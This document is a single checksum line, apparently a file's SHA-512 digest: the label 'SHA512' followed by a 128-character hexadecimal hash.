SHA512130bad3f050bc78f76e63a28ce72c3632d6a9dff9c610bfa928d7dddf5df82e624c2b6332cadfe875cd7ec7c65f7bd34e89d4e324b061dff5b7028c3a4fded00